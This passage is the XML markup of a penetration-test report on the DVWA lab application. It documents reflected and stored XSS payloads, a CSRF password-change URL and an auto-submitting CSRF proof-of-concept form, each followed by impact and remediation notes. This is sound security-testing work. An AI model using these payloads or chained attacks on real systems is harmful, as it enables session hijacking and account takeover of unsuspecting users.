          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6: Injected script executes immediately, confirming unsanitized reflection of user input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Demonstrate real-world impact by accessing the victim's active session cookie:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762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457450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7: The live PHPSESSID session cookie is exposed via the injected script — this value could be exfiltrated to an attacker-controlled server to hijack the victim's session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Session hijacking via cookie theft, allowing an attacker to impersonate a logged-in user without credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Delivery requires only that a victim click a crafted link containing the payload in the URL — a realistic phishing vector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Could be extended to redirect victims to malicious sites, log keystrokes, or perform actions on the victim's behalf (e.g., chained with the CSRF finding below).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTML-encode all user-supplied input before rendering it in the page (e.g., convert &lt; &gt; " ' &amp; to their HTML entity equivalents).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply a strict Content Security Policy (CSP) to restrict inline script execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set the HttpOnly flag on session cookies to prevent them from being read by client-side JavaScript, limiting the impact even if XSS occurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Cross-Site Scripting (Stored) — Guestbook Message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="E67E22" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">SEVERITY: HIGH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2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">/dvwa/vulnerabilities/xss_s/  (Guestbook Message field)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">CWE-79: Cross-Site Scripting (Stored)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">mtxMessage (POST parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The guestbook feature stores user-submitted messages in the database and renders them, unsanitized, to every visitor of the page. Unlike reflected XSS, this payload is persistent — it does not require a victim to click a crafted link; simply visiting the guestbook page is sufficient to trigger the payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Submitted the following payload in the Message field:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('Stored XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762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457450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 8: The script executes immediately upon submission. Critically, it also re-fires on every subsequent page load without resubmission, confirming persistent storage in the backend database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Higher severity than reflected XSS: no social engineering or malicious link required — the payload executes automatically for every visitor, including administrators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Could be used to silently compromise every user who views the guestbook page, at scale, until the malicious entry is removed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The same session-hijacking and account-takeover impact described in the Reflected XSS finding applies here, but with a substantially larger and more passive victim pool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitize and HTML-encode all user input before storing and before rendering it back to any user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use an allowlist-based HTML sanitization library if any rich-text formatting must be preserved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply the same Content Security Policy and HttpOnly cookie protections recommended for the Reflected XSS finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 Cross-Site Request Forgery (CSRF) — Change Password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="E67E22" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">SEVERITY: HIGH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2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">/dvwa/vulnerabilities/csrf/  (Change Password form)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">CWE-352: Cross-Site Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">A01:2021 - Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Request Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">GET (state-changing action performed via GET request)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The password change function performs a sensitive, state-changing action (updating the account password) via a simple GET request, with no anti-CSRF token tying the request to a legitimate, user-initiated form submission. This means the request parameters can be fully predicted and reproduced by an attacker in advance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At Security Level Low, the password can be changed with no current-password confirmation at all:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.56.106/dvwa/vulnerabilities/csrf/?password_new=hacked123&amp;password_conf=hacked123&amp;Change=Change</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762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457450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 9: Password successfully changed via a plain GET request with no prior authentication of intent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A proof-of-concept HTML page was built to demonstrate real-world delivery: an auto-submitting form that fires this exact request the instant the page loads, requiring no interaction from the victim beyond opening the page while logged into DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;body onload="document.forms[0].submit()"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;form action="http://192.168.56.106/dvwa/vulnerabilities/csrf/" method="GET"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="password_new" value="hacked123"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="password_conf" value="hacked123"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="Change" value="Change"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Comparison across security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50"/>
        <w:gridCol w:w="3250"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
            <w:shd w:fill="1F2A44" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3250"/>
            <w:shd w:fill="1F2A44" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Current Password Required?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3250"/>
            <w:shd w:fill="1F2A44" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Prior Info Attacker Needs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Victim's current password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Notably, even at the High security setting, the application does not implement a true anti-CSRF token — it relies solely on additionally requiring the current password. In a realistic attack chain, this requirement does not fully mitigate risk: the SQL Injection finding in this report already demonstrated recovery of the admin account's current password ('password'), which could be paired with this CSRF attack to achieve a full, silent account takeover even at High security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker can silently change a logged-in victim's password by getting them to visit a malicious web page — no phishing of credentials required, only a single click or page visit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At High security, impact is reduced but not eliminated when combined with credentials obtained through other means (e.g., the SQL Injection finding).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement unique, unpredictable anti-CSRF tokens embedded in the form and validated server-side on every state-changing request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use POST (not GET) for all state-changing actions, and never rely on request method alone as a security control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply the SameSite=Strict or SameSite=Lax cookie attribute to session cookies to prevent them from being sent on cross-site requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
